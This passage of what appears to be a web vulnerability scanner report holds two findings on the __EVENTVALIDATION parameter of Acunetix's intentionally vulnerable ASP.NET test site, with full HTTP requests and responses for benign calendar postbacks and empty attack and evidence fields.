to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1173 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,173 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8342&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABwWcu9oIHgJTRBYBBgDA2lkuvdoIZGRk9fJ5nded%2Fvo%2BYllnIuXVOWmbBzo%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLqs%2FvxDgLHkIz%2BDgL%2BkLjwCwLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0%2FAvukvT8C%2B6TR0wkC%2B6TR0wkC%2B6TF9gIC%2B6TF9gIC%2B6T5jQoC%2B6T5jQoC%2B6TtoAMC%2B6TtoAMC%2B6SBxwwC%2B6SBxwwC%2B6T1rAkC%2B6T1rAkC%2B6TpwwIC%2B6TpwwIC3Mv76AUC3Mv76AUC3Mvvjw0C3Mvvjw0C3MuDogYC3MuDogYC3Mu3%2BQ8C3Mu3%2BQ8C3MurnAcC3MurnAcC3MvfMALcy98wAtzL89cJAtzL89cJAtzL5%2BoCAtzL5%2BoCAtzL29MPAtzL29MPAtzLz%2FYIAtzLz%2FYIArHS2Z8KArHS2Z8KArHSzbIDArHSzbIDArHS4ckMArHS4ckMArHSlewFArHSlewFArHSiYMNArHSiYMNArHSvaYGArHSvaYGArHS0foPArHS0foPArHSxZEHArHSxZEHArHSufkFArHSufkFArHSrZwNArHSrZwNAor5vwUCivm%2FBQKK%2BdPZCQKK%2BdPZCQKK%2Bcf8AgKK%2Bcf8AgKK%2BfuTCgKK%2BfuTCgKK%2Be%2B2AwKK%2Be%2B2AwKK%2BYPNDAKK%2BYPNDAKK%2BbfgBQKK%2BbfgBQKK%2BauHDQKK%2BauHDQKK%2BZ%2FsCwKK%2BZ%2FsCwKK%2BbODAwKK%2BbODA1jpKvVCHuhLHEANz8ihOw%2Fn7sNx
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:50:28 GMT Content-Length: 12617
Response Body - size: 12,617 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABwWcu9oIHgJTRBYBBgDA2lkuvdoIZGRk9fJ5nded/vo+YllnIuXVOWmbBzo=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLqs/vxDgLHkIz+DgL+kLjwCwLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0/AvukvT8C+6TR0wkC+6TR0wkC+6TF9gIC+6TF9gIC+6T5jQoC+6T5jQoC+6TtoAMC+6TtoAMC+6SBxwwC+6SBxwwC+6T1rAkC+6T1rAkC+6TpwwIC+6TpwwIC3Mv76AUC3Mv76AUC3Mvvjw0C3Mvvjw0C3MuDogYC3MuDogYC3Mu3+Q8C3Mu3+Q8C3MurnAcC3MurnAcC3MvfMALcy98wAtzL89cJAtzL89cJAtzL5+oCAtzL5+oCAtzL29MPAtzL29MPAtzLz/YIAtzLz/YIArHS2Z8KArHS2Z8KArHSzbIDArHSzbIDArHS4ckMArHS4ckMArHSlewFArHSlewFArHSiYMNArHSiYMNArHSvaYGArHSvaYGArHS0foPArHS0foPArHSxZEHArHSxZEHArHSufkFArHSufkFArHSrZwNArHSrZwNAor5vwUCivm/BQKK+dPZCQKK+dPZCQKK+cf8AgKK+cf8AgKK+fuTCgKK+fuTCgKK+e+2AwKK+e+2AwKK+YPNDAKK+YPNDAKK+bfgBQKK+bfgBQKK+auHDQKK+auHDQKK+Z/sCwKK+Z/sCwKK+bODAwKK+bODA1jpKvVCHuhLHEANz8ihOw/n7sNx" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8309')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">November 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8370')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8338')" style="color:Black" title="October 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8339')" style="color:Black" title="October 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8340')" style="color:Black" title="November 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8341')" style="color:Black" title="November 02">2</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8342')" style="color:White" title="November 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8343')" style="color:Black" title="November 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8344')" style="color:Black" title="November 05">5</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8345')" style="color:Black" title="November 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8346')" style="color:Black" title="November 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8347')" style="color:Black" title="November 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8348')" style="color:Black" title="November 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8349')" style="color:Black" title="November 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8350')" style="color:Black" title="November 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8351')" style="color:Black" title="November 12">12</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8352')" style="color:Black" title="November 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8353')" style="color:Black" title="November 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8354')" style="color:Black" title="November 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8355')" style="color:Black" title="November 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8356')" style="color:Black" title="November 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8357')" style="color:Black" title="November 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8358')" style="color:Black" title="November 19">19</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8359')" style="color:Black" title="November 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8360')" style="color:Black" title="November 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8361')" style="color:Black" title="November 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8362')" style="color:Black" title="November 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8363')" style="color:Black" title="November 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8364')" style="color:Black" title="November 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8365')" style="color:Black" title="November 26">26</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1115 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,115 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8320&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOeI%2Fo9oIHgJTRBYBBgBAxLTkq9oIZGRkletBeJ6rja%2FKYjdNwwSI52U1RQo%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLqt6%2FjAQLiidrKBQL%2BkPzjAQLX2ajvAgLX2ajvAgLX2dyDCgLX2dyDCgLX2fCmAwLX2fCmAwLX2eT9DALX2eT9DALX2ZiQBALX2ZiQBALX2cz5AgLX2cz5AgLX2eCcCgLX2eCcCgKo4PKFDQKo4PKFDQKo4ObYBgKo4ObYBgKo4Jr%2FDwKo4Jr%2FDwKo4I6SBwKo4I6SBwKo4KIpAqjgoikCqODWzQkCqODWzQkCqODK4AICqODK4AICqOD%2BhwoCqOD%2BhwoCqODS7AgCqODS7AgCqODGAwKo4MYDAo330KgDAo330KgDAo33xM8MAo33xM8MAo33%2BOIFAo33%2BOIFAo337LkNAo337LkNAo33gNwGAo33gNwGAo33tPMPAo33tPMPAo33qJYHAo33qJYHAo333CoCjffcKgKN97CSDQKN97CSDQKN96SpBgKN96SpBgLmnbfeCQLmnbfeCQLmnav1AgLmnav1AgLmnd%2BJCgLmnd%2BJCgLmnfOsAwLmnfOsAwLmnefDDALmnefDDALmnZvmBQLmnZvmBQLmnY%2B9DQLmnY%2B9DQLmnaPQBgLmnaPQBgLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0%2FAvukvT8C%2B6TR0wkC%2B6TR0wkC%2B6TF9gIC%2B6TF9gJBpmQ0Lk828D1B9EjCpx58bHXzEw%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:26:20 GMT Content-Length: 12597
Response Body - size: 12,597 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOeI/o9oIHgJTRBYBBgBAxLTkq9oIZGRkletBeJ6rja/KYjdNwwSI52U1RQo=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLqt6/jAQLiidrKBQL+kPzjAQLX2ajvAgLX2ajvAgLX2dyDCgLX2dyDCgLX2fCmAwLX2fCmAwLX2eT9DALX2eT9DALX2ZiQBALX2ZiQBALX2cz5AgLX2cz5AgLX2eCcCgLX2eCcCgKo4PKFDQKo4PKFDQKo4ObYBgKo4ObYBgKo4Jr/DwKo4Jr/DwKo4I6SBwKo4I6SBwKo4KIpAqjgoikCqODWzQkCqODWzQkCqODK4AICqODK4AICqOD+hwoCqOD+hwoCqODS7AgCqODS7AgCqODGAwKo4MYDAo330KgDAo330KgDAo33xM8MAo33xM8MAo33+OIFAo33+OIFAo337LkNAo337LkNAo33gNwGAo33gNwGAo33tPMPAo33tPMPAo33qJYHAo33qJYHAo333CoCjffcKgKN97CSDQKN97CSDQKN96SpBgKN96SpBgLmnbfeCQLmnbfeCQLmnav1AgLmnav1AgLmnd+JCgLmnd+JCgLmnfOsAwLmnfOsAwLmnefDDALmnefDDALmnZvmBQLmnZvmBQLmnY+9DQLmnY+9DQLmnaPQBgLmnaPQBgLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0/AvukvT8C+6TR0wkC+6TR0wkC+6TF9gIC+6TF9gJBpmQ0Lk828D1B9EjCpx58bHXzEw==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8279')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">October 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8303')" style="color:Black" title="September 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8304')" style="color:Black" title="September 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8305')" style="color:Black" title="September 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8306')" style="color:Black" title="September 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8307')" style="color:Black" title="September 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8308')" style="color:Black" title="September 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8309')" style="color:Black" title="October 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8310')" style="color:Black" title="October 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8311')" style="color:Black" title="October 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8312')" style="color:Black" title="October 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8313')" style="color:Black" title="October 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8314')" style="color:Black" title="October 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8315')" style="color:Black" title="October 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8316')" style="color:Black" title="October 08">8</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8317')" style="color:Black" title="October 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8318')" style="color:Black" title="October 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8319')" style="color:Black" title="October 11">11</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8320')" style="color:White" title="October 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8321')" style="color:Black" title="October 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8322')" style="color:Black" title="October 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8323')" style="color:Black" title="October 15">15</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8324')" style="color:Black" title="October 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8325')" style="color:Black" title="October 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8326')" style="color:Black" title="October 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8327')" style="color:Black" title="October 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8328')" style="color:Black" title="October 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8329')" style="color:Black" title="October 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8330')" style="color:Black" title="October 22">22</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8331')" style="color:Black" title="October 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8332')" style="color:Black" title="October 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8333')" style="color:Black" title="October 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8334')" style="color:Black" title="October 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8335')" style="color:Black" title="October 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8336')" style="color:Black" title="October 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8337')" style="color:Black" title="October 29">29</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8338')" style="color:Black" title="October 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8339')" style="color:Black" title="October 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8340')" style="color:Black" title="November 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8341')" style="color:Black" title="November 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8342')" style="color:Black" title="November 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8343')" style="color:Black" title="November 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8344')" style="color:Black" title="November 05">5</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
